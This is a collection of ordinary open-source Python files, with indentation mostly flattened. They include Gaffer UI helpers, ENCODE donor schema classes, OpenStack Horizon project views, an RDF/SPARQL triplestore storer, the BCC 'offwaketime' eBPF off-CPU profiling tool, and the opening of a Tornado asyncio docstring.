if nodeGraph is not None or focussedOnly :
return nodeGraph
nodeGraphs = scriptWindow.getLayout().editors( GafferUI.NodeGraph )
return nodeGraphs[0] if nodeGraphs else None
def __scriptAndParent( menu ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
script = scriptWindow.scriptNode()
nodeGraph = __nodeGraph( menu )
if nodeGraph is not None :
parent = nodeGraph.graphGadget().getRoot()
else :
parent = script
return script, parent
def __undoAvailable( menu ) :
scriptNode = menu.ancestor( GafferUI.ScriptWindow ).scriptNode()
return scriptNode.undoAvailable()
def __redoAvailable( menu ) :
scriptNode = menu.ancestor( GafferUI.ScriptWindow ).scriptNode()
return scriptNode.redoAvailable()
def __inputNodes( node, inputNodes ) :
def __walkPlugs( parent ) :
for plug in parent :
if isinstance( plug, Gaffer.Plug ) :
inputPlug = plug.getInput()
if inputPlug is not None :
inputNode = inputPlug.node()
if inputNode is not None and not inputNode.isSame( node ) :
inputNodes.add( inputNode )
else :
__walkPlugs( plug )
__walkPlugs( node )
def __outputNodes( node, outputNodes ) :
def __walkPlugs( parent ) :
for plug in parent :
if isinstance( plug, Gaffer.Plug ) :
outputPlugs = plug.outputs()
if outputPlugs :
for outputPlug in outputPlugs :
outputNode = outputPlug.node()
if outputNode is not None and not outputNode.isSame( node ) :
outputNodes.add( outputNode )
else :
__walkPlugs( plug )
__walkPlugs( node )
|
|
from snovault import (
abstract_collection,
calculated_property,
collection,
load_schema,
)
from snovault.util import Path
from pyramid.security import Authenticated
from .base import (
Item,
paths_filtered_by_status,
)
@abstract_collection(
name='donors',
unique_key='accession',
properties={
'title': "Donors",
'description': 'Listing of all types of donor.',
})
class Donor(Item):
base_types = ['Donor'] + Item.base_types
schema = load_schema('encoded:schemas/donor.json')
embedded = [
'organism',
'characterizations',
'characterizations.award',
'characterizations.lab',
'characterizations.submitted_by',
'documents',
'documents.award',
'documents.lab',
'documents.submitted_by',
'lab'
]
set_status_up = [
'characterizations',
'documents',
]
set_status_down = []
name_key = 'accession'
rev = {
'characterizations': ('DonorCharacterization', 'characterizes')
}
def unique_keys(self, properties):
keys = super(Donor, self).unique_keys(properties)
if properties.get('status') != 'replaced':
if 'external_ids' in properties:
keys.setdefault('alias', []).extend(properties['external_ids'])
return keys
@calculated_property(schema={
"title": "Characterizations",
"type": "array",
"items": {
"type": ['string', 'object'],
"linkFrom": "DonorCharacterization.characterizes"
},
})
def characterizations(self, request, characterizations):
return paths_filtered_by_status(request, characterizations)
@collection(
name='mouse-donors',
unique_key='accession',
acl=[],
properties={
'title': 'Mouse donors',
'description': 'Listing Biosample Donors'
})
class MouseDonor(Donor):
item_type = 'mouse_donor'
schema = load_schema('encoded:schemas/mouse_donor.json')
embedded = Donor.embedded + [
'genetic_modifications',
'genetic_modifications.modified_site_by_target_id',
'genetic_modifications.modified_site_by_target_id.genes',
'genetic_modifications.treatments'
]
embedded_with_frame = [
Path('references', exclude=['datasets', 'publication_data']),
]
set_status_up = [
'characterizations',
'source',
'genetic_modifications',
'parent_strains',
'documents',
]
set_status_down = []
def __ac_local_roles__(self):
# Disallow lab submitter edits
return {Authenticated: 'role.viewing_group_member'}
@collection(
name='fly-donors',
unique_key='accession',
properties={
'title': 'Fly donors',
'description': 'Listing Biosample Donors'
})
class FlyDonor(Donor):
item_type = 'fly_donor'
schema = load_schema('encoded:schemas/fly_donor.json')
embedded = Donor.embedded + ['organism',
'genetic_modifications',
'genetic_modifications.modified_site_by_target_id',
'genetic_modifications.modified_site_by_target_id.genes',
'genetic_modifications.treatments',
'characterizations']
set_status_up = [
'characterizations',
'source',
'genetic_modifications',
'parent_strains',
'documents',
]
set_status_down = []
@collection(
name='worm-donors',
unique_key='accession',
properties={
'title': 'Worm donors',
'description': 'Listing Biosample Donors',
})
class WormDonor(Donor):
item_type = 'worm_donor'
schema = load_schema('encoded:schemas/worm_donor.json')
embedded = Donor.embedded + ['organism',
'genetic_modifications',
'genetic_modifications.modified_site_by_target_id',
'genetic_modifications.modified_site_by_target_id.genes',
'genetic_modifications.treatments']
set_status_up = [
'characterizations',
'source',
'genetic_modifications',
'parent_strains',
'documents',
]
set_status_down = []
@collection(
name='human-donors',
unique_key='accession',
properties={
'title': 'Human donors',
'description': 'Listing Biosample Donors',
})
class HumanDonor(Donor):
item_type = 'human_donor'
schema = load_schema('encoded:schemas/human_donor.json')
embedded = Donor.embedded
embedded_with_frame = [
Path('references', exclude=['datasets', 'publication_data']),
]
rev = {
'children': ('HumanDonor', 'parents'),
'characterizations': ('DonorCharacterization', 'characterizes')
}
@calculated_property(schema={
"description": "Human donor(s) that have this human donor in their parent property.",
"comment": "Do not submit. Values in the list are reverse links of a human donors that have this biosample under their parents property.",
"title": "Children",
"type": "array",
"items": {
"type": ['string', 'object'],
"linkFrom": "HumanDonor.parents"
},
"notSubmittable": True,
})
def children(self, request, children):
return paths_filtered_by_status(request, children)
@collection(
name='manatee-donors',
unique_key='accession',
properties={
'title': 'Manatee donors',
'description': 'Listing Biosample Donors',
})
class ManateeDonor(Donor):
item_type = 'manatee_donor'
schema = load_schema('encoded:schemas/manatee_donor.json')
embedded = Donor.embedded + ['organism',
'genetic_modifications',
'genetic_modifications.modified_site_by_target_id',
'genetic_modifications.modified_site_by_target_id.genes',
'genetic_modifications.treatments']
set_status_up = [
'characterizations',
'source',
'genetic_modifications',
'documents',
]
set_status_down = []
|
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf import settings
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import messages
from horizon import tables
from horizon import tabs
from horizon.utils import memoized
from horizon import workflows
from openstack_dashboard import api
from openstack_dashboard.api import keystone
from openstack_dashboard import policy
from openstack_dashboard import usage
from openstack_dashboard.usage import quotas
from openstack_dashboard.dashboards.identity.projects \
import tables as project_tables
from openstack_dashboard.dashboards.identity.projects \
import tabs as project_tabs
from openstack_dashboard.dashboards.identity.projects \
import workflows as project_workflows
from openstack_dashboard.dashboards.project.overview \
import views as project_views
from openstack_dashboard.utils import identity
from openstack_dashboard.utils import settings as setting_utils
PROJECT_INFO_FIELDS = ("domain_id",
"domain_name",
"name",
"description",
"enabled")
INDEX_URL = "horizon:identity:projects:index"
class TenantContextMixin(object):
@memoized.memoized_method
def get_object(self):
tenant_id = self.kwargs['tenant_id']
try:
return api.keystone.tenant_get(self.request, tenant_id, admin=True)
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve project information.'),
redirect=reverse(INDEX_URL))
def get_context_data(self, **kwargs):
context = super(TenantContextMixin, self).get_context_data(**kwargs)
context['tenant'] = self.get_object()
return context
class IndexView(tables.DataTableView):
table_class = project_tables.TenantsTable
template_name = 'identity/projects/index.html'
page_title = _("Projects")
def needs_filter_first(self, table):
return self._needs_filter_first
def has_more_data(self, table):
return self._more
def get_data(self):
tenants = []
marker = self.request.GET.get(
project_tables.TenantsTable._meta.pagination_param, None)
self._more = False
filters = self.get_filters()
self._needs_filter_first = False
if policy.check((("identity", "identity:list_projects"),),
self.request):
# If filter_first is set and no other filters are
# selected, then search criteria must be provided, so
# return an empty list
if (setting_utils.get_dict_config(
'FILTER_DATA_FIRST', 'identity.projects') and not filters):
self._needs_filter_first = True
self._more = False
return tenants
domain_id = identity.get_domain_id_for_operation(self.request)
try:
tenants, self._more = api.keystone.tenant_list(
self.request,
domain=domain_id,
paginate=True,
filters=filters,
marker=marker)
except Exception:
exceptions.handle(self.request,
_("Unable to retrieve project list."))
elif policy.check((("identity", "identity:list_user_projects"),),
self.request):
try:
tenants, self._more = api.keystone.tenant_list(
self.request,
user=self.request.user.id,
paginate=True,
marker=marker,
filters=filters,
admin=False)
except Exception:
exceptions.handle(self.request,
_("Unable to retrieve project information."))
else:
msg = \
_("Insufficient privilege level to view project information.")
messages.info(self.request, msg)
if api.keystone.VERSIONS.active >= 3:
domain_lookup = api.keystone.domain_lookup(self.request)
for t in tenants:
t.domain_name = domain_lookup.get(t.domain_id)
return tenants
class ProjectUsageView(usage.UsageView):
table_class = usage.ProjectUsageTable
usage_class = usage.ProjectUsage
template_name = 'identity/projects/usage.html'
csv_response_class = project_views.ProjectUsageCsvRenderer
csv_template_name = 'project/overview/usage.csv'
page_title = _("Project Usage")
def get_data(self):
super(ProjectUsageView, self).get_data()
return self.usage.get_instances()
class CreateProjectView(workflows.WorkflowView):
workflow_class = project_workflows.CreateProject
def get_initial(self):
initial = super(CreateProjectView, self).get_initial()
# Set the domain of the project
domain = api.keystone.get_default_domain(self.request)
initial["domain_id"] = domain.id
initial["domain_name"] = domain.name
return initial
class UpdateProjectView(workflows.WorkflowView):
workflow_class = project_workflows.UpdateProject
def get_initial(self):
initial = super(UpdateProjectView, self).get_initial()
project_id = self.kwargs['tenant_id']
initial['project_id'] = project_id
try:
# get initial project info
project_info = api.keystone.tenant_get(self.request, project_id,
admin=True)
for field in PROJECT_INFO_FIELDS:
initial[field] = getattr(project_info, field, None)
if keystone.VERSIONS.active >= 3:
# get extra columns info
ex_info = settings.PROJECT_TABLE_EXTRA_INFO
for ex_field in ex_info:
initial[ex_field] = getattr(project_info, ex_field, None)
# Retrieve the domain name where the project belongs
try:
if policy.check((("identity", "identity:get_domain"),),
self.request):
domain = api.keystone.domain_get(self.request,
initial["domain_id"])
initial["domain_name"] = domain.name
else:
domain = api.keystone.get_default_domain(self.request)
initial["domain_name"] = domain.name
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve project domain.'),
redirect=reverse(INDEX_URL))
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve project details.'),
redirect=reverse(INDEX_URL))
return initial
class UpdateQuotasView(workflows.WorkflowView):
workflow_class = project_workflows.UpdateQuota
def get_initial(self):
initial = super(UpdateQuotasView, self).get_initial()
project_id = self.kwargs['tenant_id']
initial['project_id'] = project_id
try:
# get initial project quota
if keystone.is_cloud_admin(self.request):
quota_data = quotas.get_tenant_quota_data(self.request,
tenant_id=project_id)
for field in quotas.QUOTA_FIELDS:
initial[field] = quota_data.get(field).limit
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve project quotas.'),
redirect=reverse(INDEX_URL))
initial['disabled_quotas'] = quotas.get_disabled_quotas(self.request)
return initial
class DetailProjectView(tabs.TabView):
tab_group_class = project_tabs.ProjectDetailTabs
template_name = 'horizon/common/_detail.html'
page_title = "{{ project.name }}"
def get_context_data(self, **kwargs):
context = super(DetailProjectView, self).get_context_data(**kwargs)
project = self.get_data()
table = project_tables.TenantsTable(self.request)
context["project"] = project
context["url"] = reverse(INDEX_URL)
context["actions"] = table.render_row_actions(project)
return context
@memoized.memoized_method
def get_data(self):
try:
project_id = self.kwargs['project_id']
project = api.keystone.tenant_get(self.request, project_id)
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve project details.'),
redirect=reverse(INDEX_URL))
return project
def get_tabs(self, request, *args, **kwargs):
project = self.get_data()
return self.tab_group_class(request, project=project, **kwargs)
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2016, Silvio Peroni <[email protected]>
#
# Permission to use, copy, modify, and/or distribute this software for any purpose
# with or without fee is hereby granted, provided that the above copyright notice
# and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT,
# OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE,
# DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS
# SOFTWARE.
__author__ = 'essepuntato'
from SPARQLWrapper import SPARQLWrapper
from reporter import Reporter
import re
import os
from rdflib import Graph, BNode, ConjunctiveGraph
import shutil
import json
from datetime import datetime
import argparse
import io
from conf_spacin import *
from support import find_paths, has_bib_entity_number
class Storer(object):
def __init__(self, graph_set=None, repok=None, reperr=None,
context_map={}, dir_split=0, n_file_item=1):
self.dir_split = dir_split
self.n_file_item = n_file_item
self.context_map = context_map
for context_url in context_map:
context_file_path = context_map[context_url]
with open(context_file_path) as f:
context_json = json.load(f)
self.context_map[context_url] = context_json
if graph_set is None:
self.g = []
else:
self.g = graph_set.graphs()
if repok is None:
self.repok = Reporter(prefix="[Storer: INFO] ")
else:
self.repok = repok
if reperr is None:
self.reperr = Reporter(prefix="[Storer: ERROR] ")
else:
self.reperr = reperr
self.preface_query = ""
def store_all(self, base_dir, base_iri, context_path, tmp_dir=None, g_set=[], override=False):
for g in g_set:
self.g += [g]
self.repok.new_article()
self.reperr.new_article()
self.repok.add_sentence("Starting the process")
processed_graphs = {}
for cur_g in self.g:
processed_graphs = self.store(cur_g, base_dir, base_iri, context_path, tmp_dir,
override, processed_graphs, False)
stored_graph_path = []
for cur_file_path in processed_graphs:
stored_graph_path += [cur_file_path]
self.__store_in_file(processed_graphs[cur_file_path], cur_file_path, context_path)
return stored_graph_path
def upload_and_store(self, base_dir, triplestore_url, base_iri, context_path,
tmp_dir=None, g_set=[], override=False):
stored_graph_path = self.store_all(base_dir, base_iri, context_path, tmp_dir, g_set, override)
# If some graphs were not stored properly, none of them will be uploaded to the triplestore,
# but we highlight those that could have been added in principle by marking them
# with a ".notuploaded" file
if None in stored_graph_path:
for file_path in stored_graph_path:
# Create a marker for the file not uploaded in the triplestore
open("%s.notuploaded" % file_path, "w").close()
self.reperr.add_sentence("[6] "
"The statements of in the JSON-LD file '%s' were not "
"uploaded into the triplestore." % file_path)
else: # All the files have been stored
self.upload_all(self.g, triplestore_url, base_dir)
def __query(self, query_string, triplestore_url, n_statements=None, base_dir=None):
if query_string != "":
try:
tp = SPARQLWrapper(triplestore_url)
tp.setMethod('POST')
tp.setQuery(query_string)
tp.query()
if n_statements is None:
self.repok.add_sentence(
"Triplestore updated by means of a SPARQL Update query.")
else:
self.repok.add_sentence(
"Triplestore updated with %s more RDF statements." % n_statements)
return True
except Exception as e:
self.reperr.add_sentence("[1] "
"Graph was not loaded into the "
"triplestore due to communication problems: %s" % str(e))
if base_dir is not None:
tp_err_dir = base_dir + os.sep + "tp_err"
if not os.path.exists(tp_err_dir):
os.makedirs(tp_err_dir)
cur_file_err = tp_err_dir + os.sep + \
datetime.now().strftime('%Y-%m-%d-%H-%M-%S-%f_not_uploaded.txt')
with io.open(cur_file_err, "w", encoding="utf-8") as f:
f.write(query_string)
return False
def upload_all(self, all_g, triplestore_url, base_dir):
result = True
self.repok.new_article()
self.reperr.new_article()
query_string = None
total_new_statements = None
for idx, cur_g in enumerate(all_g):
cur_idx = idx % 10
if cur_idx == 0:
if query_string is not None:
result &= self.__query(query_string, triplestore_url, total_new_statements, base_dir)
query_string = u""
total_new_statements = 0
else:
query_string += u" ; "
total_new_statements += len(cur_g)
query_string += self.get_preface_query(cur_g) + Storer._make_insert_query(cur_g)
if query_string is not None and query_string != "":
result &= self.__query(query_string, triplestore_url, total_new_statements, base_dir)
return result
def execute_upload_query(self, query_string, triplestore_url):
self.repok.new_article()
self.reperr.new_article()
return self.__query(query_string, triplestore_url)
def upload(self, cur_g, triplestore_url):
self.repok.new_article()
self.reperr.new_article()
query_string = Storer._make_insert_query(cur_g)
return self.__query(query_string, triplestore_url, len(cur_g))
def set_preface_query(self, query_string):
self.preface_query = query_string
def get_preface_query(self, cur_g):
if self.preface_query != "":
if type(cur_g.identifier) is BNode:
return u"CLEAR DEFAULT ; "
else:
return u"WITH <%s> " % str(cur_g.identifier) + self.preface_query + " ; "
else:
return ""
@staticmethod
def _make_insert_query(cur_g):
if type(cur_g.identifier) is BNode:
return u"INSERT DATA { %s }" % cur_g.serialize(format="nt")
else:
return u"INSERT DATA { GRAPH <%s> { %s } }" % \
(str(cur_g.identifier), cur_g.serialize(format="nt"))
def __store_in_file(self, cur_g, cur_file_path, context_path):
cur_json_ld = json.loads(
cur_g.serialize(format="json-ld", context=self.__get_context(context_path)))
if isinstance(cur_json_ld, dict):
cur_json_ld["@context"] = context_path
else: # it is a list
for item in cur_json_ld:
item["@context"] = context_path
with open(cur_file_path, "w") as f:
json.dump(cur_json_ld, f, indent=4)
self.repok.add_sentence("File '%s' added." % cur_file_path)
def store(self, cur_g, base_dir, base_iri, context_path, tmp_dir=None,
override=False, already_processed={}, store_now=True):
self.repok.new_article()
self.reperr.new_article()
if len(cur_g) > 0:
cur_subject = set(cur_g.subjects(None, None)).pop()
cur_dir_path, cur_file_path = find_paths(
str(cur_subject), base_dir, base_iri, self.dir_split, self.n_file_item)
try:
if not os.path.exists(cur_dir_path):
os.makedirs(cur_dir_path)
final_g = ConjunctiveGraph()
final_g.addN([item + (cur_g.identifier,) for item in list(cur_g)])
# Merging the data
if not override:
if cur_file_path in already_processed:
stored_g = already_processed[cur_file_path]
stored_g.addN(final_g.quads((None, None, None, None)))
final_g = stored_g
elif os.path.exists(cur_file_path):
# This is a conjunctive graph that contains all the triples (and graphs)
# the file is actually defining - they could be more than those using
# 'cur_subject' as subject.
final_g = self.load(cur_file_path, cur_g, tmp_dir)
already_processed[cur_file_path] = final_g
if store_now:
self.__store_in_file(final_g, cur_file_path, context_path)
return already_processed
except Exception as e:
self.reperr.add_sentence("[5] It was impossible to store the RDF statements in %s. %s" %
(cur_file_path, str(e)))
return None
def __get_context(self, context_url):
if context_url in self.context_map:
return self.context_map[context_url]
else:
return context_url
def __get_first_context(self):
for context_url in self.context_map:
return self.context_map[context_url]
def load(self, rdf_file_path, cur_graph=None, tmp_dir=None):
self.repok.new_article()
self.reperr.new_article()
if os.path.isfile(rdf_file_path):
try:
cur_graph = self.__load_graph(rdf_file_path, cur_graph)
except IOError:
if tmp_dir is not None:
current_file_path = tmp_dir + os.sep + "tmp_rdf_file.rdf"
shutil.copyfile(rdf_file_path, current_file_path)
try:
cur_graph = self.__load_graph(current_file_path, cur_graph)
except IOError as e:
self.reperr.add_sentence("[2] "
"It was impossible to handle the format used for "
"storing the file (stored in the temporary path) '%s'. "
"Additional details: %s"
% (current_file_path, str(e)))
os.remove(current_file_path)
else:
self.reperr.add_sentence("[3] "
"It was impossible to try to load the file from the "
"temporary path '%s' since that has not been specified in "
"advance" % rdf_file_path)
else:
self.reperr.add_sentence("[4] "
"The file specified ('%s') doesn't exist."
% rdf_file_path)
return cur_graph
def __load_graph(self, file_path, cur_graph=None):
formats = ["json-ld", "rdfxml", "turtle", "trig"]
current_graph = ConjunctiveGraph()
if cur_graph is not None:
current_graph.parse(data=cur_graph.serialize(format="trig"), format="trig")
for cur_format in formats:
try:
if cur_format == "json-ld":
with open(file_path) as f:
json_ld_file = json.load(f)
if isinstance(json_ld_file, dict):
json_ld_file = [json_ld_file]
for json_ld_resource in json_ld_file:
# Trick to force the use of a pre-loaded context if the format
# specified is JSON-LD
context_json = None
if "@context" in json_ld_resource:
cur_context = json_ld_resource["@context"]
if cur_context in self.context_map:
context_json = self.__get_context(cur_context)["@context"]
json_ld_resource["@context"] = context_json
current_graph.parse(data=json.dumps(json_ld_resource), format=cur_format)
else:
current_graph.parse(file_path, format=cur_format)
return current_graph
except Exception as e:
errors = " | " + str(e) # Try another format
raise IOError("1", "It was impossible to handle the format used for storing the file '%s'%s" %
(file_path, errors))
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser("storer.py")
arg_parser.add_argument("-i", "--input", dest="input", required=True,
help="The file containing the query to execute, the JSON-LD to upload, "
"or a directory containing several files with both queries and RDF.")
arg_parser.add_argument("-c", "--conf", dest="conf",
help="The name of the module with particular service configuration to "
"import. If it is left unspecified, the script will use the "
"default one ('i.e. conf_spacin').")
args = arg_parser.parse_args()
if args.conf is not None:
my_conf = __import__(args.conf)
for attr in dir(my_conf):
if not attr.startswith("__"):
globals()[attr] = getattr(my_conf, attr)
storer = Storer(repok=Reporter(True), reperr=Reporter(True),
context_map={context_path: context_file_path})
all_files = []
if os.path.isdir(args.input):
for cur_dir, cur_subdir, cur_files in os.walk(args.input):
for cur_file in cur_files:
full_path = cur_dir + os.sep + cur_file
if re.search(os.sep + "prov" + os.sep, full_path) is None and \
not full_path.endswith("index.json"):
all_files += [full_path]
else:
all_files += [args.input]
for cur_file in all_files:
if not os.path.basename(cur_file).startswith("index"):
storer.repok.new_article()
storer.repok.add_sentence("Processing file '%s'" % cur_file)
if cur_file.endswith(".txt"):
with io.open(cur_file, "r", encoding="utf-8") as f:
query_string = f.read()
storer.execute_upload_query(query_string, triplestore_url)
elif cur_file.endswith(".json"):
conj_g = storer.load(cur_file, tmp_dir=temp_dir_for_rdf_loading)
for cur_g in conj_g.contexts():
storer.upload(cur_g, triplestore_url)
storer.repok.write_file("storer_ok.txt")
storer.reperr.write_file("storer_err.txt")
|
|
#!/usr/bin/python
#
# offwaketime Summarize blocked time by kernel off-CPU stack + waker stack
# For Linux, uses BCC, eBPF.
#
# USAGE: offwaketime [-h] [-u] [-p PID] [-v] [-f] [duration]
#
# The current implementation uses an unrolled loop for x86_64, and was written
# as a proof of concept. This implementation should be replaced in the future
# with an appropriate bpf_ call, when available.
#
# The Off-CPU stack is currently limited to a stack trace depth of 20
# (maxtdepth), and the waker stack limited to 10 (maxwdepth). This is also
# limited to kernel stacks, and x86_64 only. Check for future versions, where
# these limitations should be removed.
#
# Copyright 2016 Netflix, Inc.
# Licensed under the Apache License, Version 2.0 (the "License")
#
# 20-Jan-2016 Brendan Gregg Created this.
from __future__ import print_function
from bcc import BPF
from time import sleep
import argparse
import signal
# arguments
examples = """examples:
./offwaketime # trace off-CPU + waker stack time until Ctrl-C
./offwaketime 5 # trace for 5 seconds only
./offwaketime -f 5 # 5 seconds, and output in folded format
./offwaketime -u # don't include kernel threads (user only)
    ./offwaketime -p 185     # trace for PID 185 only
"""
parser = argparse.ArgumentParser(
description="Summarize blocked time by kernel stack trace + waker stack",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=examples)
parser.add_argument("-u", "--useronly", action="store_true",
help="user threads only (no kernel threads)")
parser.add_argument("-p", "--pid",
help="trace this PID only")
parser.add_argument("-v", "--verbose", action="store_true",
help="show raw addresses")
parser.add_argument("-f", "--folded", action="store_true",
help="output folded format")
parser.add_argument("duration", nargs="?", default=99999999,
help="duration of trace, in seconds")
args = parser.parse_args()
folded = args.folded
duration = int(args.duration)
debug = 0
maxwdepth = 10    # must match MAXWDEPTH in the BPF program below
maxtdepth = 20    # must match MAXTDEPTH in the BPF program below
if args.pid and args.useronly:
print("ERROR: use either -p or -u.")
exit()
# signal handler
def signal_ignore(signal, frame):
print()
# define BPF program
bpf_text = """
#include <uapi/linux/ptrace.h>
#include <linux/sched.h>
#define MAXWDEPTH 10
#define MAXTDEPTH 20
#define MINBLOCK_US 1
struct key_t {
char waker[TASK_COMM_LEN];
char target[TASK_COMM_LEN];
u64 wret[MAXWDEPTH];
u64 tret[MAXTDEPTH];
};
BPF_HASH(counts, struct key_t);
BPF_HASH(start, u32);
struct wokeby_t {
char name[TASK_COMM_LEN];
u64 ret[MAXWDEPTH];
};
BPF_HASH(wokeby, u32, struct wokeby_t);
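// Frame-pointer stack walk (x86_64 only): for a frame pointer bp, *(bp + 8)
// holds the return address and *bp holds the caller's saved frame pointer,
// so each get_frame() call yields one return address and moves bp up one
// frame. Addresses below __START_KERNEL_map are not kernel text and are
// discarded.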
static u64 get_frame(u64 *bp) {
if (*bp) {
// The following stack walker is x86_64 specific
u64 ret = 0;
if (bpf_probe_read(&ret, sizeof(ret), (void *)(*bp+8)))
return 0;
if (bpf_probe_read(bp, sizeof(*bp), (void *)*bp))
*bp = 0;
if (ret < __START_KERNEL_map)
return 0;
return ret;
}
return 0;
}
int waker(struct pt_regs *ctx, struct task_struct *p) {
u32 pid = p->pid;
if (!(FILTER))
return 0;
u64 bp = 0;
struct wokeby_t woke = {};
int depth = 0;
bpf_get_current_comm(&woke.name, sizeof(woke.name));
bp = ctx->bp;
// unrolled loop (MAXWDEPTH):
if (!(woke.ret[depth++] = get_frame(&bp))) goto out;
if (!(woke.ret[depth++] = get_frame(&bp))) goto out;
if (!(woke.ret[depth++] = get_frame(&bp))) goto out;
if (!(woke.ret[depth++] = get_frame(&bp))) goto out;
if (!(woke.ret[depth++] = get_frame(&bp))) goto out;
if (!(woke.ret[depth++] = get_frame(&bp))) goto out;
if (!(woke.ret[depth++] = get_frame(&bp))) goto out;
if (!(woke.ret[depth++] = get_frame(&bp))) goto out;
if (!(woke.ret[depth++] = get_frame(&bp))) goto out;
woke.ret[depth] = get_frame(&bp);
out:
wokeby.update(&pid, &woke);
return 0;
}
int oncpu(struct pt_regs *ctx, struct task_struct *p) {
u32 pid = p->pid;
u64 ts, *tsp;
// record previous thread sleep time
if (FILTER) {
ts = bpf_ktime_get_ns();
start.update(&pid, &ts);
}
// calculate current thread's delta time
pid = bpf_get_current_pid_tgid();
tsp = start.lookup(&pid);
if (tsp == 0)
return 0; // missed start or filtered
u64 delta = bpf_ktime_get_ns() - *tsp;
start.delete(&pid);
delta = delta / 1000;
if (delta < MINBLOCK_US)
return 0;
// create map key
u64 zero = 0, *val, bp = 0;
int depth = 0;
struct key_t key = {};
struct wokeby_t *woke;
bpf_get_current_comm(&key.target, sizeof(key.target));
bp = ctx->bp;
// unrolled loop (MAXTDEPTH):
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
if (!(key.tret[depth++] = get_frame(&bp))) goto out;
key.tret[depth] = get_frame(&bp);
out:
woke = wokeby.lookup(&pid);
if (woke) {
__builtin_memcpy(&key.wret, woke->ret, sizeof(key.wret));
__builtin_memcpy(&key.waker, woke->name, TASK_COMM_LEN);
wokeby.delete(&pid);
}
val = counts.lookup_or_init(&key, &zero);
(*val) += delta;
return 0;
}
"""
if args.pid:
filter = 'pid == %s' % args.pid
elif args.useronly:
filter = '!(p->flags & PF_KTHREAD)'
else:
filter = '1'
bpf_text = bpf_text.replace('FILTER', filter)
if debug:
print(bpf_text)
# initialize BPF
b = BPF(text=bpf_text)
b.attach_kprobe(event="finish_task_switch", fn_name="oncpu")
b.attach_kprobe(event="try_to_wake_up", fn_name="waker")
matched = b.num_open_kprobes()
if matched == 0:
print("0 functions traced. Exiting.")
exit()
# header
if not folded:
print("Tracing blocked time (us) by kernel off-CPU and waker stack",
end="")
if duration < 99999999:
print(" for %d secs." % duration)
else:
print("... Hit Ctrl-C to end.")
# output
while (1):
try:
sleep(duration)
except KeyboardInterrupt:
# as cleanup can take many seconds, trap Ctrl-C:
signal.signal(signal.SIGINT, signal_ignore)
if not folded:
print()
counts = b.get_table("counts")
for k, v in sorted(counts.items(), key=lambda counts: counts[1].value):
if folded:
# fold target stack
line = k.target + ";"
for i in reversed(range(0, maxtdepth)):
if k.tret[i] == 0:
continue
line = line + b.ksym(k.tret[i])
if i != 0:
line = line + ";"
# add delimiter
line = line + ";-"
# fold waker stack
for i in range(0, maxwdepth):
line = line + ";"
if k.wret[i] == 0:
break
line = line + b.ksym(k.wret[i])
if i != 0:
line = line + ";" + k.waker
# print as a line
print("%s %d" % (line, v.value))
else:
# print wakeup name then stack in reverse order
print(" %-16s %s" % ("waker:", k.waker))
for i in reversed(range(0, maxwdepth)):
if k.wret[i] == 0:
continue
print(" %-16x %s" % (k.wret[i],
b.ksym(k.wret[i])))
# print delimiter
print(" %-16s %s" % ("-", "-"))
# print default multi-line stack output
for i in range(0, maxtdepth):
if k.tret[i] == 0:
break
print(" %-16x %s" % (k.tret[i],
b.ksym(k.tret[i])))
print(" %-16s %s" % ("target:", k.target))
print(" %d\n" % v.value)
counts.clear()
if not folded:
print("Detaching...")
exit()
|
|
"""Bridges between the `asyncio` module and Tornado IOLoop.
.. versionadded:: 3.2
This module integrates Tornado with the ``asyncio`` module introduced
in Python 3.4. This makes it possible to combine the two libraries on
the same event loop.
.. deprecated:: 5.0
While the code in this module is still used, it is now enabled
automatically when `asyncio` is available, so applications should
no longer need to refer to this module directly.
.. note::
Tornado requires the `~asyncio.AbstractEventLoop.add_reader` family of
methods, so it is not compatible with the `~asyncio.ProactorEventLoop` on
Windows. Use the `~asyncio.SelectorEventLoop` instead.
"""
import concurrent.futures
